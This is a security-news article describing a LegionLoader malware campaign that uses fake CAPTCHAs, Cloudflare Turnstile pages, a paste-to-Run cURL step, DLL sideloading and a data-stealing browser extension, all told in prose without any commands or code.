HQ/EMEAFind out how we can help your business
A newly discovered malicious campaign uses deceptive tactics to spread the LegionLoader malware.
Reports revealed that the operation uses phoney CAPTCHAs and CloudFlare Turnstile to trick potential victims into downloading the malware, which then installs a harmful browser extension.
Researchers noted that the malicious payload came from phishing and malware campaigns aimed at individuals seeking PDF documents online. These campaigns frequently employ deceptive methods within these PDFs to lure victims to dangerous websites or trick them into downloading malware.
CAPTCHAS and CloudFlare Turnstile are the primary infection vectors of the LegionLoader malware.
According to investigations, in this recently uncovered campaign, the malware operators used fake CAPTCHAs and CloudFlare Turnstile to deliver the LegionLoader.
The infection chain begins with a drive-by download triggered when a victim searches for a specific document and is tricked into visiting a malicious website.
Upon downloading the document, the victim will encounter a fake CAPTCHA; clicking it redirects them through a Cloudflare Turnstile CAPTCHA to a deceptive notification page, continuing the infection process.
Victims are then prompted to enable browser notifications before proceeding.
If a victim rejects the browser notification request or uses a browser that does not allow notifications, they will be directed to download harmless apps such as 7-Zip and Opera. Suppose the victim agrees to receive browser notifications. In that case, they are forwarded to a second Cloudflare Turnstile CAPTCHA, which they must complete before being directed to a page with instructions on downloading the targeted content.
This download method requires the victim to open the Windows Run window, paste a command using Ctrl+V, and run it.
The command launches cURL from the command line and downloads an MSI file, then opens File Explorer to the location where the MSI file was downloaded. Running this MSI file launches the initial payload.
The attackers employ various strategies to evade detection, including using a legitimate VMware-signed application to sideload a malicious DLL that loads and executes the LegionLoader payload.
Furthermore, a new proprietary algorithm is also used to decrypt the LegionLoader shellcode loader, further complicating detection efforts. The attackers’ website then requires cURL to download the MSI installation, while attempts to access the URL through a browser result in a notice claiming the file was removed due to service rule violations.
The final stage of the assault is to install a malicious browser extension. This extension can collect sensitive user and computer information from several browsers, including Chrome, Edge, Brave, and Opera.
